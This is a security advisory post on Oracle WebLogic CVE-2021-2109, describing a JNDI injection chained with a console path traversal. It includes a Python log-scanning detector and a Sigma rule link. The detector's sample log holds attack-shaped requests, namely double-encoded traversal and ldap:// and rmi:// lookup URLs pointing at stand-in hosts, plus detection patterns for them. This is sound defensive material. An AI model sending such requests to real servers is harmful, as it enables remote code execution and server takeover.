Oracle WebLogic Server Vulnerability (CVE-2021-2109) Results in Complete Server Takeover
A high-severity remote code execution issue in Oracle Fusion Middleware Console enables full Oracle WebLogic Server compromise.
New Oracle WebLogic Server Vulnerability
The flaw allows an authenticated actor with high privileges to misuse the “JndiBinding” handler and launch a JNDI (Java Naming and Directory Interface) injection. This, in turn, enables retrieving and deserializing a malicious class from a server under the attacker’s control, which results in arbitrary code execution on the Oracle WebLogic Server.
Although exploitation requires authentication, an attacker might overcome this obstacle by leveraging the directory traversal method related to the previously uncovered remote code execution flaw in WebLogic Server (CVE-2020-14882). As a result, CVE-2021-2109 might be easily exploited by an unauthenticated hacker via a single HTTP request.
The vulnerability was assigned a score of 7.2 under CVSS version 3.1, marking it as a high-severity bug. Notably, security holes in Oracle WebLogic Server quickly grab the attention of threat actors, which increases the chances of CVE-2021-2109 being exploited in the wild.
The vulnerability was reported to Oracle on November 19, 2020, by the Alibaba Cloud Security research group and patched by the vendor on January 20, 2021. Proof-of-concept exploits (for both authenticated and unauthenticated attackers) were released in January 2021.
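The two ingredients of the unauthenticated chain described above, a directory traversal into the administration console and a JNDI URL (ldap://, rmi://, iiop://) smuggled into a request parameter, both leave traces in the web server access log. The following script is an added example, not code from the original post or from SOC Prime's Sigma rule: it parses Combined Log Format lines, repeatedly URL-decodes the request target so that double-encoded traversal sequences such as %252e%252e are exposed, and flags console requests that carry traversal and/or a JNDI scheme. The sample log lines are constructed, the /console prefix is the WebLogic default console path, and the exact handler parameter names are deliberately not assumed; the check is a heuristic that a SIEM rule would refine further.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format); none of this is real traffic.
# Line 2 combines a double-encoded traversal in the console path with an ldap:// URL,
# line 4 carries only a URL-encoded rmi:// URL, lines 1 and 3 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Jan/2021:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1834
10.0.0.7 - - [21/Jan/2021:10:00:09 +0000] "GET /console/css/%252e%252e/example.portal?handle=ldap://198.51.100.9:1389/a HTTP/1.1" 200 512
10.0.0.8 - - [21/Jan/2021:10:00:12 +0000] "GET /index.jsp HTTP/1.1" 200 221
10.0.0.9 - - [21/Jan/2021:10:00:15 +0000] "POST /console/console.portal?_nfpb=true&host=rmi%3A%2F%2F203.0.113.4%3A1099%2Fx HTTP/1.1" 302 0
"""

# Combined Log Format: client, ident, user, [timestamp], "METHOD target protocol", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# JNDI lookup schemes that a JNDI injection payload would reference.
JNDI_SCHEME_RE = re.compile(r'\b(ldaps?|rmi|iiop)://', re.IGNORECASE)
# Path traversal after decoding: "../" or "..\".
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')

# Default WebLogic administration console path prefix (assumption: not customised).
CONSOLE_PREFIX = '/console'


def fully_decode(value, max_rounds=3):
    """URL-decode until the string stops changing, so %252e%252e becomes '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_request(target):
    """Return a list of finding labels for one request target (path plus query)."""
    decoded = fully_decode(target)
    findings = []
    if decoded.lower().startswith(CONSOLE_PREFIX) and TRAVERSAL_RE.search(decoded):
        findings.append('console-path-traversal')
    if JNDI_SCHEME_RE.search(decoded):
        findings.append('jndi-url-in-request')
    return findings


def scan_log(text):
    """Scan access-log text and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # unparseable line: skip rather than guess
        findings = analyze_request(match['target'])
        if findings:
            alerts.append({
                'ip': match['ip'],
                'timestamp': match['ts'],
                'target': match['target'],
                'findings': findings,
                # Traversal plus a JNDI URL in one request matches the unauthenticated chain.
                'severity': 'high' if len(findings) == 2 else 'medium',
            })
    return alerts


if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['ip']} {alert['target']} -> {alert['findings']}")
```

Decoding in a loop matters because the console traversal relies on double URL encoding: a single unquote() still leaves %2e%2e, which the traversal pattern would miss. Running the script on a real access log only requires replacing SAMPLE_LOG with the file contents; a hit on the high-severity combination is the signal to pull the request body and the server's outbound connection logs for the same timestamp.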
The bug affects the following supported versions of Oracle WebLogic Server: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Users are urged to patch ASAP to prevent possible exploitation attempts.
CVE-2021-2109 Detection
To detect the malicious activity associated with the new Oracle WebLogic Server bug (CVE-2021-2109), you can apply a Sigma rule developed by SOC Prime Threat Bounty developer Emir Erdogan:
https://tdm.socprime.com/tdm/info/yY5BqZlgeBNl/JdjQcncBR-lx4sDxsiba/
The rule has translations to the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Sumo Logic, ELK Stack, RSA NetWitness, FireEye Helix, Humio, Graylog, LogPoint
EDR: Carbon Black
MITRE ATT&CK:
Tactics: Initial Access
Techniques: Exploit Public-Facing Application (T1190)
Sign up to the Threat Detection Marketplace for free to access the 90,000+ curated SOC content library. Over 300 contributors from 70 countries enrich the library each day so that security practitioners can detect the most alarming cyber threats at the earliest stages of the attack lifecycle. Have a desire to participate in threat hunting activities and develop your own detection rules? Join our Threat Bounty program and get rewarded for your input.